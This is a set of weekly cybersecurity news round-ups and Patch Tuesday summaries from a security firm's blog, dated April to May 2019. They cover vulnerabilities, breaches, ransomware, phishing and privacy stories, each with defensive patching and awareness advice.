Cisco Talos have identified a recent campaign they have dubbed “BlackWater”, which is suspected of being associated with the known threat actor MuddyWater. New samples discovered use the same method of delivery as previous variants of MuddyWater malware, in the form of macro infected Office documents. They deliver a PowerShell backdoor and bundle new techniques that evade detection. Head over to the Talos blog for another excellent technical write up.
By Cisco Talos Intelligence.
The Magecart threat just keeps rolling on, this time hitting the subscription page on the Forbes Magazine website. Magecart uses malicious javascript to collect credit card and personal information from online checkout pages. But this attack on the Forbes sites show that the Magecart group are not just focused on ecommerce sites.
By Trend Micro
Mozilla have this week released their latest version of theFirefox browser, which aims to provide better speed and greater privacy. Version67 includes updates for two critical memory corruption vulns, that allow codeexecution and could result in a bad actor taking control of the target system. Ifyou are running Firefox its time for an update.
By Threatpost.
On the back of the critical RDP vulnerability, disclosed byMicrosoft in last week’s patch Tuesday, Cisco Talos have released Snort IDS /IPS rule coverage for CVE-2019-0708. Users of Snort can now get access to the updatefor rules set 2019-05-20 which includes rule 50137 for this vuln.
By Cisco Talos Intelligence.
And that’s it for this week round-up, please don’t forget totune in for our next instalment.
Why not follow us on social media using the links providedon the right.
Edition #42 – 24th May 2019
By
Stuart Hare
on
23/5/19
Welcome to the Ironshare Cyber Round-up where we look back atthe events of that last week and cover some of the news, posts, views, and highlightsfrom the world of Security.
In this week’s round-up:
Amazon.com have revealed that over the last six months, theywere hit by an extensive fraud attack that allowed hackers to siphon funds fromcompromised merchant accounts. Phishing attacks were likely used to gain accessto account credentials, but its unsure how much was actually stolen byattackers.
By E Hacking News.
The WhatsApp messaging app has been hit by a flaw that allowsbad actors to install silent spyware to a victim’s smartphone, by simply makinga single phone call. Although the spyware was targeting a small percentage ofthe 1.5Billion users, all IOS, Android and Windows mobile device platformsappear to vulnerable. Get updating your WhatsApp now!
By Naked Security
The Huawei saga keeps rolling on, with a former MI6 chief urgingthe UK Government to reconsider their decision to use Huawei in the new 5Gmobile network. Although Huawei state they have never participated in Chinesestate espionage, the former MI6 leader states they are ‘unable to operate freeof the control of the Chinese Government’.
By The Guardian.
This months Microsoft Patch Tuesday has disclosed a criticalvulnerability in the Remote Desktop Services Feature that can be exploitedwithout the need for valid login details. Older operating systems such as Windows7, 2008 are vulnerable. Microsoft must be concerned about this threat as they evenprovided updates for the no longer supported Windows XP and 2003. Get patchingyour servers now and if you have internet accessible RDP servers, we suggestyou get these secured ASAP.
By Microsoft Technet.
A new Spectre-like set of side channel attacks have been identifiedin Intel CPUs, that has the potential to leak sensitive data. Four separate attackvectors (ZombieLoad, Fallout, RIDL and Store-to-Leak) are associated with thisthreat, with the possibility of leaking information such as user keys, diskencryption keys and passwords from CPU buffers. Intel is releasing CPU updates,in conjunction with vendors updates from Red Hat, Oracle and Microsoft, tomitigate the threat.
By Threat Post
Microsoft has released its regular monthly security updates,which includes a total of 79 vulnerabilities. 22 updates have been ratedCritical, 55 Important, 2 vulns have been publicly disclosed and 1 has beendetected as already being exploited in the wild. Includes a critical vuln inRemote Desktop Services that needs immediate attention.
By Ironshare.
Apple have released their latest set of product securityupdates. iOS and tvOS are updated to v12.3, macOS updates are available for Sierra,High Sierra and Mojave, while watchOS is updated to v5.2.1. iOS alone covers a totalof 42 vulnerabilities, half of these existing in WebKit which can lead to code execution.Check all your devices and get updating.
By Apple Support
And that’s it for this week round-up, please don’t forget totune in for our next instalment.
Why not follow us on social media using the links providedon the right.
Edition #41 – 17th May 2019
By
Stuart Hare
on
16/5/19
Microsoft has released its regular monthly security updates,which includes a total of 79 vulnerabilities. 22 updates have been ratedCritical, 55 Important, 2 vulns have been publicly disclosed and 1 has been detectedas already being exploited in the wild.
MS products covered by these updates are Windows OperatingSystems, Edge and Internet Explorer Browsers, Office, SQL Server, GDI+, TeamFoundation server, Skype, .Net framework and the ever present ChakraCorescripting engine.
The highest rated vuln this month belongs to CVE-2019-0708 with a CVSS Score of 9.8. This remote code execution vuln affects Remote Desktop Services (the remote administration protocol) and requires no user interaction to exploit. A successful exploit of this vulnerability can be achieved by an attacker sending a crafted RDP request to the target system, allowing the change and deletion of data, installation of applications and the creation of new privileged accounts.
Microsoft browsers have updates resolving 3 Critical CVE’sthat are related to memory corruption vulns in the scripting engine, these havea regular appearance in patch Tuesday, and are caused by the way objects arehandled in memory.
By exploiting these vuln’s through a user accessing a specially crafted web page or embedded Active X control, an attacker could execute code as the current logged in user. If the user was logged in with admin rights, they could take control of the target system. The attacker would then be able to install programs, as well as steal, change or delete data.
CVE-2019-0903 covers a critical remote code execution vuln in GDI+ the Windows Graphics Device Interface. Due to improper handling of objects in memory an attacker can take control of the target machine. This can be exploited through a file sharing attack that uses a malicious document or a web-based attack using a specially crafted web site.
The exploited vulnerability is an Important privilege elevation flaw in Windows Error Reporting (CVE-2019-0863), affecting all supported versions of the Windows Operating System. This flaw can be exploited by a bad actor who first gains unprivileged access to the target system. Privileges can be elevated to administrator level, allowing the actor to execute code, manipulate and delete data, and create new backdoor accounts with admin rights.
Please review this month’s updates and get patching as soonas you can!
Keeping up to date with security patches for your operatingsystems and software, is a critical part of delivering and maintaining a strongsecurity posture, please ensure you test and update as quickly as possible to reducerisk, prevent exploitation and to ultimately stay secure.
For a full list of this month’s updates please see the linksbelow:
Patch Tuesday release notes: https://portal.msrc.microsoft.com/en-us/security-guidance/releasenotedetail/e5989c8b-7046-e911-a98e-000d3a33a34d
Security update guide: https://portal.msrc.microsoft.com/en-us/security-guidance
By
Stuart Hare
on
14/5/19
Welcome to the Ironshare Cyber Round-up where we look back atthe events of that last week and cover some of the news, posts, views, and highlightsfrom the world of Security.
In this week’s round-up:
Action Fraud, a division of the UK Police Force and thereporting centre for fraud and cyber crime, has reported that holiday fraud sawa significant increase in 2018 in comparison to 2017. Take a look at their postto understand the risk and get tips on how to stay safe online. With over 5,000 people losing more the £7million last year, can you afford to be the next victim.
By Action Fraud.
Data recovery experts have discovered that an alarming number of second-hand hard disk drives, that are believed to have been securely wiped, still contain sensitive data. The drives were purchased on eBay and were found to include personally identifiable information, corporate data and a large number of emails.
By Bitdefender.
At least 390 Github Code Repos have been targeted by a hacker,who is removing the source code and demanding a ransom to recover it. A ransom note is left behind stating that 0.1Bitcoin should be sent to the attacker to get access to their code. Weakpasswords and Git config files containing access credentials are thought to thebe cause.
By ZDNet
A new variant of the Dharma ransomware is masquerading as anESET AV Remover, to distract its victims while it encrypts their files in thebackground. A phishing email is used for initial infection, which convinces theuser there is an issue with their PC and recommends the download and executionof a Defender.exe malicious attachment, resulting in the user’s data becoming unusable.
By Bleeping Computer.
During March, Barracuda Networks identified an increase inOffice 365 account takeovers, seeing thousands of accounts compromised. Thesecompromised accounts were then used by the bad actors to send more than 1.5million malicious spam emails, in an effort to acquire more victims. Office 365accounts continue to be a prime target for hackers, so ensure that your organisationis protected.
By Trend Micro
ESET Researchers have identified a backdoor in Microsoft’sExchange server they have called LightNeuron. This malicious Mail TransportAgent can read, modify and block email as well as creating new emails. Thisbackdoor is actively being exploited by Russian actors that are likely to benation state sponsored.
By HelpNetSecurity.
Google has released its Android Security updates for Maythis week. Patches seem to be a little light this month, including fixes for 4critical vulnerabilities, 10 high and 1 moderate. Pixel users can get hold ofthese updates immediately while Android smartphones from other vendors may haveto wait a while before they are available.
By Sophos – Naked Security
And that’s it for this week round-up, please don’t forget totune in for our next instalment.
Why not follow us on social media using the links providedon the right.
Edition #40 – 10th May 2019
By
Stuart Hare
on
10/5/19
Welcome to the Ironshare Cyber Round-up where we look back atthe events of that last week and cover some of the news, posts, views, and highlightsfrom the world of Security.
In this week’s round-up:
After gaining access to Citrix’s Network, hackers remainedactive on their systems for six months before they were detected. Data was exfiltratedincluding possible employee information.
By TechCrunch.
Last week we heard that there was a leak from the UKNational Security Council related to the government deciding to use Huawei in its5G network. As a result of this leak, former defence secretary Gavin Williamsonhas been sacked from his position, although he denies leaking the information.
By Sky News.
The Japanese Defence Ministry is considering working withprivate companies to assist in creating a computer virus as a defence mechanismagainst cyber attacks. To us this doesn’t sound like a great idea. See what youthink?
By Hot for Security.
The recently disclosed Oracle WebLogic vulnerability is actively being exploited by the bad guys. By simply accessing the WebLogic server via HTTP, hackers are launching a new ransomware attack called Sodinokibi.
By Cisco Talos.
RiskIQ have identified a large scale Magecart operation thatis targeting OpenCart based online stores, placing thousands of shopping platformsat risk of personal and financial information theft.
By Bleeping Computer.
Cisco have released 40 security advisories which included acritical vulnerability for the Nexus 9000 switches. A bug in SSH key managementservices can be exploited to allow an attacker to connect to the device withroot privileges.
By Network World.
Sky customers have been complaining after a new firmwareupdate has been breaking their broadband routers. If you are a Sky customer whohas changed the default DNS settings, you may need to roll back your router’sfirmware.
By TheRegister.
And that’s it for this week round-up, please don’t forget totune in for our next instalment.
Why not follow us on social media using the links providedon the right.
Edition #39 – 3rd May 2019
By
Stuart Hare
on
3/5/19
Welcome to the Ironshare Cyber Round-up where we look back atthe events of that last week and cover some of the news, posts, views, and highlightsfrom the world of Security.
In this week’s round-up:
The global insurance specialist Hiscox has released its 2019Cyber Readiness Report that surveyed 5,400 small, medium and large businessesacross seven countries (UK, US, Belgium, France, Germany, Netherlands &Spain) to determine how prepared they are for dealing with cyber-attacks.
As the number and intensity of cyber-attacks continues to rise,61% of firms confirmed they have reported an attack in the last year, a significantjump up from the 45% in 2018.
In the UK alone reported attacks rose from 40% to 55%.
The report shows that although the Large and Enterprise sizecompanies are still the most likely to be targeted in attacks, the stats highlightthat small and medium size firms are quickly catching them up.
Medium size firms of 50-249 employees have seen the biggestjump, rising to 63%, an overall increase of 27% on the previous year, with anaverage cost of attacks per business sitting at £142k.
While 47% of small firms (1-49 employees), now confirm they have been targeted, with those attacks having an average cost of £11k.
These stats prove that the smaller companies who feel that they won’t be targeted or have nothing of value to cyber criminals, clearly need to adjust their thinking and start taking action.
The introduction of the GDPR in May 2018 has no doubt had a big influence on the rise of reported attacks, especially considering the heavy fines that can follow a breach, if not reported in the mandated 72-hour time frame.
The biggest take away from this report is that although morecompanies of all sizes have become victims of one or more cyber-attacks, preparationto protect and defend our organisations is still way below where it needs tobe.
If you are one of those companies that are yet to establisha cyber security plan, then it’s time to make a start and get cyber ready.
On Thursday 18th April The Weather Channel was unableto air its usual programming for approximately 90 minutes, due to reportedtechnical difficulties.
Normal services were resumed at around 07:30 Eastern time inthe US, with weatherman Jim Cantore confirming that they had been the victim ofa cyber-attack:
“The Weather Channel, sadly, has been the victim of a malicious software attack today.”
These types of hacks on broadcasting organisations are rare,but as the majority now use IP networks to deliver their content, they are vulnerableto the same types of attacks that target other internet connected companies.
Although information on the attack is very limited, there arethoughts among researchers that this could be a result of a ransomware attack.
The Weather Channel reported via their twitter feed thatbackup mechanisms were used to restore the service and that the FBI have beenengaged to investigate the incident.
This week we heard that the UKs National Security Council (NSC)had agreed to allow Huawei to assist with the build of the Britain’s new 5G mobiledata network. After months of discussion on the subject, a decision was made, butnow serious concerns have been raised after that the agreement to involve Huaweiwas leaked prematurely by a senior member of NSC.
The NSC is chaired weekly by the PM and consists of seniorcabinet members, to discuss National Security concerns. NSC meetings are protectedby the Official Secrets Act, due to the nature of the intelligence that is sharedby the likes of GCHQ, MI5 and MI6.
The leak of any information from these meetings is of graveconcern to government, and its likely to be met with a criminal investigationinto its source. This appears to be the first time that a leak of NSC informationhas been committed, since it was established in 2010.
Using Huawei for the 5G network has been a huge debate globally, due to the risk of spying and espionage from a company that is associated with and possibly controlled by the Chinese Government.
This decision brings doubt into the Five Eyes Intelligence Alliance the UK is a part of with the US, Canada, Australia and New Zealand. Australia have already banned Huawei from their 5G projects and the US is now calling for the exclusion of Huawei from their Five Eyes allies.
In their 1st quarter earnings report for 2019,Facebook has stated they are setting aside up to $5 Billion to cover the possiblefines that may result from the FTC’s investigations into their poor datasecurity and privacy practices.
According to the earnings release Facebook stated:
“We estimate that the range of loss in this matter is $3 billion to $5 billion. The matter remains unresolved, and there can be no assurance as to the timing or the terms of any final outcome.”
In March last year the FTC said it would launch aninvestigation into their privacy violation dealings with Cambridge Analytica.
Further reports suggest that the SEC, FBI and DoJ are alsoinvestigating Facebook, and these fines could stack up quickly if found guilty,with $40,000 per violation.
And that’s it for this week round-up, please don’t forget totune in for our next instalment.
Why not follow us on social media using the links providedon the right.
Edition #38 – 26th April 2019
By
Stuart Hare
on
26/4/19
Welcome to the Ironshare Cyber Round-up where we look back atthe events of that last week and cover some of the news, posts, views, and highlightsfrom the world of Security.
In this week’s round-up:
An unpatched bug in the Google Chrome browser is beingexploited by cybercriminals targeting Apple iOS devices. The attack is being spreadvia a malvertising campaign, which is relying on iOS users to be more activewith browsing on their Apple devices, during the Easter period.
The exploit relies on hijacking browser sessions by redirecting the user to another site, pop-up or landing page. If the user clicks on one of these redirected sites, or pages a malicious payload is downloaded to the device and compromise can occur.
Sandboxing evasion techniques are also in use by the exploit, to ensure that these pop-ups are not blocked and it can bypass the security mechanisms that are in place to prevent redirections.
According to ThreatPost, although the campaign has only beenrunning for a few days, it is highly active in the US, with activity alsowitnessed across Europe, leading to a possible impact of half a billion user sessions.
Apparently, this threat is not just isolated to Google Chrome and may also be affecting the Safari browser, but information on this is limited.
Please stay vigilant this Easter Bank Holiday, as hackers take advantage of these extended holiday periods to go undetected.
Be careful what you click, especially when presented with pop-ups and redirects to other sites.
Researchers at Underdog Security have identified a securityflaw in Electronic Arts Origin gaming client that can allow the bad guys to launchmalicious code on the gamer’s computer.
The Origin client app is used to buy and download games fromElectronic Arts and is in use by millions of gamers worldwide.
The researchers discovered that the Origin app, running on Windows PCs, could be tricked into running any other app on the victim’s computer. They have provided proof of concept code and video footage, that shows the exploit launching the Windows Calculator app.
Their investigation shows that common attacks using PowerShellcan be used to compromise a target machine and could result in the download andinstallation of other malicious code, such as ransomware.
EA have issued a fix for this vulnerability and users areurged to update the client as soon as possible.
Earlier this week Microsoft confirmed they had discovered abreach on their web-based email platforms that has resulted in the compromiseof numerous customer email accounts.
Although the number of users impacted is said to be limited,the breach affected multiple services including MSN, Hotmail and Outlook.com,between 1st January 2019 and 28th March 2019.
Enterprise accounts using paid for services were apparently notimpacted by this breach.
The cause of this initial breach was down to one of Microsoft’ssupport agents having their credentials stolen, which allowed a remote attackerto gain access to customer email accounts.
Upon detection Microsoft has notified all users, disabledaccess to the compromised accounts and put controls in place to prevent the attacker’saccess.
These types of account compromise hacks are now all too common as more people and organisations move to web and cloud-based services. Never assume that just because you are moving to the cloud that these services are fully secure. Always review and understand the security that is in place so you can fill any gaps that exist.
Email Phishing attacks are the primary method for hackerstrying to steal user credentials (username and passwords). Always checks emailsthoroughly to ensure they are from a trusted source and never click on any misspeltor suspicious links. If in doubt with an email just delete it.
A new DNS Hijacking campaign has been discovered by the Talos research team which has been targeting national security, public and private organisations since early 2017.
The campaign, dubbed ‘Sea Turtle’ by Talos, has been primarily focused on countries in the Middle East and North Africa, and has so far impacted at least 40 organisations across 13 different countries. In addition, a secondary group of victims have also been targeted which includes Internet Service Providers and Domain registrars.
DNS hijacking is technique that allows an actor to controlan organisations domain name space, giving them the ability to redirect trafficto hacker-controlled servers.
Talos believe that this is the work of a state sponsored actor that is trying to achieve persistent access to its target network environments, with a goal of gaining access to sensitive information and intelligence. These are highly capable actors, who are responsible for the first confirmed case of a Domain name registry compromise.
Organisations typically forget about securing their externalservices such as DNS, but these can be an easy target if not included in your overallsecurity strategy. Where available it is recommended to implement Multi-Factor Authentication(aka Two Factor Authentication or Two Step-Verification) on your external DNS accounts.As per Talos recommendations you can also consider a registry lock service,that requires separate authentication / approval before any DNS changes can bemade.
Well it wouldn’t seem a normal week without mentioninganother Facebook privacy issue. This time the social media giant is being criticisedfor the harvesting of email contact information of 1.5 million new users.
We mentioned in a previous issue how Facebook were requesting access to users email accounts in order to verify their identity, well it seems from this latest issue that this was not the only reason they wanted access to the email accounts of new users.
As part of this verification process which appears to haverun for almost 3 years, Facebook used the email verification process to takecopies of the email accounts contact list without the explicit permission ofthe user.
Facebook have stated that they have now changed the way theyprocess new users and that email contacts are no longer being uploaded to itsplatform.
What is evident is that users are no longer going totolerate the poor privacy and data handling practices of Facebook, with approx.15 million users in the US alone closing their accounts in the last 2 years andlooking for alternative social media platforms.
And that’s it for this week round-up, we hope you have a happy Easter and enjoy the bank holiday weekend. Please don’t forget to tune in for our next instalment.
Why not follow us on social media using the links providedon the right.
Edition #37 – 19th April 2019
By
Stuart Hare
on
19/4/19
Welcome to the Ironshare Cyber Round-up where we look back atthe events of that last week and cover some of the news, posts, views, and highlightsfrom the world of Security.
In this week’s round-up:
It’s the time of the month again where Microsoft release thenews on their vulnerable products and the patches available to fix them. Thismonth there are a total of 74 vulnerabilities disclosed with 16 rated Critical,54 Important, 1 Moderate and 3 Low.
These updates cover issues found in software products suchas, MS Windows Operating Systems, Internet Explorer, MS Edge, Office, MSExchange Server, the scripting engine, Team Foundation Server and more.
CVE-2019-0803 & CVE-2019-0859 cover two vulnerabilities rated Important, that exist in the Win32K component of the Windows operating system. By failing to handle memory objects properly, these vulns allow an attacker to run code in kernel mode and elevate their privileges, so they can view, change and delete data. New accounts could also be created with full user rights.
Note that both of these vulns are currently being actively exploitedin the wild, so its very important to address these quickly.
Last week it was reported that the ICO have fined Londonbased Newham Council, £145,000 after it was responsible for leaking thepersonal information of alleged gang members.
After the London Riots in 2011 the Met Police created adatabase that captured intelligence which identified possible gang members,based on their history of violent crime and other information provided by localcouncils.
An unredacted copy of information from this database was leakedin 2017, after a Newham council worker sent the list in an email to 44 recipientswhich included both internal departments and numerous external organisations.
Through the use of Snapchat, photographic copies of thislist found its way into the hands of rival gang members. Although there was anincreased level of gang related violence that year it is unclear whether thisdata leak was the cause.
We are unfortunately all to familiar with the constant databreaches we see in news each week, often resulting in personal and financial informationloss, but rarely do we see breaches such as this that directly threatens human life.
This drills home the importance and simple fact thatorganisations of all types and sizes, are still not doing enough to securetheir data and educate their users on how to use it, both appropriately andsecurely.
UK Universitynetworks have been subject to a series of tests in order to understand how goodtheir defences were against cyber-attacks. Unfortunately, the results of thesetests have highlighted that in every case valuable data was obtained within twohours.
These penetrationtests were jointly organised by JISC (the Joint Information Systems Committee)and HEPI (Higher Education Policy Institute) and were scheduled to take placeagainst 50 universities in the UK.
Ethical Hackers from the JISC’s in house team were tasked with carrying out the tests, which not only saw a 100% success rate against all tested universities, but they also managed to reach personal information for staff and students, and access research databases, within two hours of starting the test.
It won’t be asurprise to most familiar with cyber security that spear phishing attacks werethe most effective method used in these tests.
Spear phishing attacksuse crafted emails that are sent to specific targets within an organisation,pretending to be from a trusted source, with the intent to convince the user toclick on a bad link or download malicious attachments / software.
Universities hold awealth of valuable information for both cyber criminals and nation state actorsworking for foreign governments. Not only do they contain a vast amount ofpersonal information for staff and students, but they also store research dataand intellectual property that is worth great value to these foreigngovernments.
These tests highlighthow vulnerable our UK universities are to cyber-attack, meaning greater focuson improving cyber defences is urgently required.
Talking to the BBC, aUK spokeswoman for UK Universities stated that they are now working with theUK’s National Cyber Security Centre (NCSC), to help improve and strengthensecurity practices to better protect the sector from cyber threats.
An exploited vulnerability has been identified in thepopular Yuzo Related Posts WordPressplugin, which allows attackers to inject malicious JavaScript into the pages ofthe target systems website.
Exploiting this vuln allows an unauthenticated attacker to modifythe plugins settings, to a value that includes a malicious JavaScript. Once theJavaScript is injected it can be used to redirect visitors of the compromisedwebsite to attacker-controlled websites or fraudulent scam sites.
The JavaScript used here contains a redirect that sends visitors to following URL:
httpx://hellofromhony[.]org/counter
Once the user reaches this URL, numerous other redirects occurs, which eventually leads them to various scam sites, including a tech support scam page.
Researchers at Wordfence believe that this exploit shares a lot of commonalities with two other vulns, found in the Social Warfare and Easy WP SMTP plugins. The same IP address (176[.]123[.]9[.]53) used for accessing the URL above was also used in these previous exploits, both of which delivered malicious redirects as part of their campaigns.
This vulnerability is believed to impact over 60,000 sites that currently have this plugin actively installed within WordPress. The plugin developer became aware of this vuln and on March 30th the plugin was removed from the WordPress Plugin directory. This prevented any new users from downloading the plugin, but left the existing user still exposed.
The exploit of this vulnerability has been the unfortunateresult of a security researcher’s irresponsible actions, who publicly disclosedthe vuln along with a proof of concept, prior to a fix being released by thedeveloper.
Website JavaScript injection has become a common method for attackers in recent times. Formjacking techniques such as those used by the Magecart exploit in the Ticketmaster and British Airways breaches last year, have been used to steal customer credit card information from the website, without having to compromise the server or network infrastructure first.
The developer recommends that any users of their Yuzo RelatedPosts plugin should remove it from their WordPress site immediately, until theycan release a fix for this vulnerability.
To protect yourself from these types of WordPress threats,always ensure that your WordPress site and its plugins are always kept up todate with the latest versions of software.
In addition, WordPress users should also strongly considerthe use of a WordPress or Web Application Firewall, to provide an extra layerof defence against such web attacks.
As with most new technologies its never plain sailing whenit comes to developing secure solutions, and it’s been no different with thenew Wi-Fi Security standard WPA3.
The WPA3 or Wi-Fi Protected Access 3 protocol is thenext-generation in Wi-Fi Security and is due to replace the aging and lesssecure WPA2 protocol we use today.
In their April 10th press release the Wi-Fi alliance have issued an update on two identified vulns found in a limited number of early implementations of WPA3-Personal, where devices running attacker software, can capture information and expose passwords due to improper implementation of cryptographic functions.
Researchers have released a paper titled DragonBlood thatcovers the two vulns. The first is a downgrade attack that forces WPA3supported devices to connect using an insecure WPA2 handshake. This is thenfollowed by the second flaw that incorporates two side-channel attacks whichlead to the attackers obtaining the Wi-Fi password through an offline dictionarystyle attack.
The Wi-Fi alliance state that multiple CVEs have been raisedunder the IDs CVE-2019-9494 to CVE-2019-9499 to cover these flaws, but limitedinformation is currently available from Mitre.
A simple software update is already available from the smallnumber of device manufacturers affected by these WPA3 flaws.
More details can be found on The Hackers News website.
And that’s it for this week round-up, please don’t forget totune in for our next instalment.
Why not follow us on social media using the links providedon the right.
Edition #36 – 12th April 2019
By
Stuart Hare
on
11/4/19
It’s the time of the month again where Microsoft release thenews on their vulnerable products and the patches available to fix them. Thismonth there are a total of 74 vulnerabilities disclosed with 16 rated Critical,54 Important, 1 Moderate and 3 Low.
These updates cover issues found in software products suchas, MS Windows Operating Systems, Internet Explorer, MS Edge, Office, MSExchange Server, the scripting engine, Team Foundation Server and more.
CVE-2019-0803 & CVE-2019-0859 cover two vulnerabilities rated Important, that exist in the Win32K component of the Windows operating system. By failing to handle memory objects properly, these vulns allow an attacker to run code in kernel mode and elevate their privileges, so they can view, change and delete data. New accounts could also be created with full user rights.
Note that both of these vulns are currently being actively exploitedin the wild, so its very important to address these quickly.
Never too far away from a security issue, Server Message Block (SMB) appears this month with a critical privilege escalation and remote code execution vuln. CVE-2019-0786 can be exploited by an attacker using a specially crafted file over the SMB protocol, allowing them to bypass security checks in the operating system. This can lead to a complete system takeover by the remote attacker.
One of the biggest CVSS scores of the month (7.8) goes to the GDI+ remote code execution vuln covered by CVE-2019-0853. Again, this is another case of improper memory object handling but this time in the Windows Graphics Device Interface.
This can be exploited in two different ways; via a web-basedattack which lures users into accessing a malicious website; or via afile-sharing attack where attackers convince the user to open a malicious document.When successfully exploited the target system can be completely controlled by aremote attacker.
Five of the 16 critical vulns in this release exist in MS XML Core Services parser process. CVE-2019-0790 to CVE-2019-0793 & CVE-2019-0795, all cover a remote code execution vuln that can result in the bad guys taking control of the target system.
These can be exploited through the use of a phishing email and a malicious website, where attackers can use the users web browsers to launch MS XML and run their malicious code remotely.
There are several known issues highlighted in this monthsPatch Tuesday, so please review the releases notes, to ensure these areunderstood.
One such issue appears in the Windows 2008 SP2 operating system, where the updates can get stuck on stage 2 or 3 of the restart process.
This is due to Microsoft releasing a new servicing stackupdate (SSU), which all users of Windows 2008 SP2 will need to install, toensure they can continue to receive the latest security updates.
This SSU is required for the operating system to support futurefixes and updates that are signed with the SHA-2 hashing algorithm.
Microsoft recommends that users install the servicing stackupdate before trying to install this month’s updates / rollup, to prevent theabove mentioned stuck at stage x issue.
If you have started the update and you get the stuck message, don’t worry, simply press Ctrl + Alt + Delete and login. MS believe that this stuck issue should only happen once.
For more info on the SSU click here.
It is important to review this month’s updates and getpatching as soon as you possibly can!
Keeping up to date with security patches for your operatingsystems and software, is a critical part of delivering and maintaining a strongsecurity posture, please ensure you test and update as quickly as possible toreduce risk, prevent exploitation and to ultimately stay secure.
For a full list of this month’s updates please see the linksbelow:
By
Stuart Hare
on
10/4/19
Welcome to the Ironshare Cyber Round-up where we look back atthe events of that last week and cover some of the news, posts, views, and highlightsfrom the world of Security.
In this week’s round-up:
Arizona Beverages a large US based beverage supplier hasthis week been recovering from a devastating Ransomware attack, that left thecompany unable to operate for several days.
Two weeks on from the initial infection and they are still notback to a fully restored service, although they are now up and running with theirsales operation.
It is believed that the infection was the iEncrypt ransomware, a possible variant of BitPaymer, which resulted in over 200 Windows based servers, PCs and laptops having their data encrypted and rendering them useless.
Although not confirmed, it is understood that the initial infection was introduced through a malicious email attachment, and like BitPaymer, it is highly likely that this was delivered using the Emotet trojan.
Once the infection was detected, AB staff were instructed thattheir computers could be compromised and that they should not power on theirdevices, copy files or connect to the network.
As there is no known decryption tool for iEncrypt, AB hadlimited options for recovering from the attack, and this got significantlyworse when 24 hours later, IT staff found that the backup solution had beenmisconfigured and it could not be used to restore the service.
It is believed that Arizona Beverages lost millions ofdollars per day while they were down due to lost sales.
Several big mistakes appear to have been made leading up toand during this attack:
The true depth of the damage caused may not be known forsome time, but we encourage organisations to learn from the mistakes of others.Be prepared so you can effectively protect and react in the event that youbecome the victim.
In the last couple of years Facebook have been taking a lotof stick due to numerous screw-ups with data privacy and security. It has gotten no better for them this week, asthey were hit with a double whammy of privacy concerns.
The first and biggest screw-up came in the form of anotherdata breach, this time 540 million Facebook users’ records have been left exposedonline by a third-party developer.
Researchers at UpGuard discovered the breach, which was caused by a third-party media company called Cultura Colectiva, after they left the records available and unsecured in Amazon S3 buckets.
Amazon S3, short for Simple Storage Service, is commonly used by developers to provide an easy way to store and retrieve data, unfortunately though, with no password used on these S3 buckets data was freely accessible for anyone on the internet.
The exposed data contained Facebook account information thatincluded names, email addresses, Facebook IDs, photos, check-ins, friend lists,interests, and more.
This at least might take the heat off the Cambridge Analytica issue - with data of only 87 million users shared with the 3rd party, it pales in comparison to this new breach of privacy.
It doesn’t end there though, Facebook are now asking users for their email account password to continue using the service. This has obviously raised more than a few eyebrows across the security industry. The message states:
“To continue using Facebook, you’ll need to confirm your email address. Because you signed up with [email address], you can do that automatically …”
By doing this you are basically giving Facebook access to your email account, which they should not be asking for. Facebook have stated that this information is not stored, but in the light of a lot of other issues in this area, can they be trusted.
Facebook have apparently acknowledged that this is not theright thing to do:
“We understand the password verification option isn’t the best way to go about this, so we are going to stop offering it,”
There is no legitimate reason for them to require your emailaccount and password. So if you see this message our advice is to not enteryour details and refrain from using Facebook until they remove this.
Like Facebook, the Chinese tech and telecoms giant Huawei, areonly too familiar with concerns over the security and privacy of their products.Its been a standing concern with western governments, that Huawei products maynot be safe, due to the possibility of Chinese government involvement, and thepotential for backdoors in their products that could be used to commit espionageand infiltration.
These concerns may have been realised to some extent thisweek, with reports of a flaw discovered by Microsoft Researchers, in the HuaweiMateBook Laptops.
A sophisticated flaw appears to have been inserted duringthe manufacturing of the products, that would allow an attacker to not only spyon the machine and its user, but also take full control of the target computer.
It is understood that this flaw may be linked to the NSA’s DoublePulsarback door that was leaked by the Shadowbrokers back in 2017, although it is unclearat what point in the manufacturing process this exploit was introduced.
According to the BBC there are no signs that Huawei havedone anything malicious, and there is a possibility that this could have been occurredupstream in the supply chain.
Huawei are a big player in the new 5G network infrastructure and services, where there has been equal concern, and unfortunately incidents such as this will not help their case with convincing governments that their products are indeed safe to use.
Since last year Microsoft have been working on improvedmechanisms for password security, and after a running a preview release, AzureActive Directory Password Protection is now available on general release forAzure AD Premium subscribers.
AAD Password Protection will provide administrators with the ability to add an additional layer of security to users of its Microsoft cloud and hybrid environments, by preventing them from setting poor passwords that maybe easy to guess or have been found included in known data breaches.
This new feature will make it easier for organisations to ensure users are creating better passwords, and significantly harder for malicious actors to launch successful Password Spray Attacks against its users and systems.
This new feature can protect accounts in Azure AD and hybrid on premise Window Server Active Directory deployments. It uses a banned list of 500 of the most common passwords, a banned password algorithm and a custom password blacklist, that can be controlled by the organisation’s administrators.
As with all elements of security, things can change very quickly, and it’s no different here. Microsoft’s security research and analysis teams ensure that any changes or additions to this feature and its lists are constantly updated as they become available.
In the event that users try to configure a banned passwordthey will be presented with the following error message:
"Unfortunately, your password contains a word, phrase,or pattern that makes your password easily guessable. Please try again with adifferent password."
This is a great step forward for Microsoft cloud users, andwe recommend that organisations take steps to include this as another layer ofsecurity.
And that’s it for this week round-up, please don’t forget totune in for our next instalment.
Why not follow us on social media using the links providedon the right.
Edition #35 – 5th April 2019
By
Stuart Hare
on
4/4/19
Welcome to the Ironshare Cyber Round-up where we look back atthe events of that last week and cover some of the news, posts, views, and highlightsfrom the world of Security.
In this week’s round-up:
The Kaspersky Labs news blog has highlighted a new phishingscam that it is targeting highly popular Instagram accounts.
Attackers have launched a phishing campaign that is sending CopyrightInfringement emails to users, in an attempt to get them to hand over theiraccount login details, so they can take over their accounts.
The content of the email is pretty convincing, althoughanyone checking the links etc. will be able to identify that it is indeed fake.
The message contained in the email tries to scare the victim,by claiming that due to violating copyright laws, their account is being disabledand that they have 24 hours before the account is deleted.
Clicking the link in the email redirects the user to anInstagram phishing site, that pretends to give the option of Appealing the decision.
If you decide to appeal and click the link, the site thenasks to verify your Instagram account by logging in with your credentials,which is where the fraudsters capture and steal your username and password.
After losing your credentials, they seal the deal by givingyou a nice message before redirecting you to the real Instagram page.
Social media account hacks are common place in cyber crimeand misinformation campaigns that deliver fake news.
Being aware of these types of attacks will help you to spotmalicious emails and protect both yourself and your personal data.
Awareness alone is not enough though, remember:
Back in 2014, security researchers came across a new threatin the wild they dubbed Emotet.
